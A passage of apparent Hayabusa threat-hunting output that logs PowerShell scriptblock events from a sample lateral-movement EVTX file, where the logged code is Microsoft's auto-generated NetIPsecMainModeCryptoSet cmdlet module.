$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 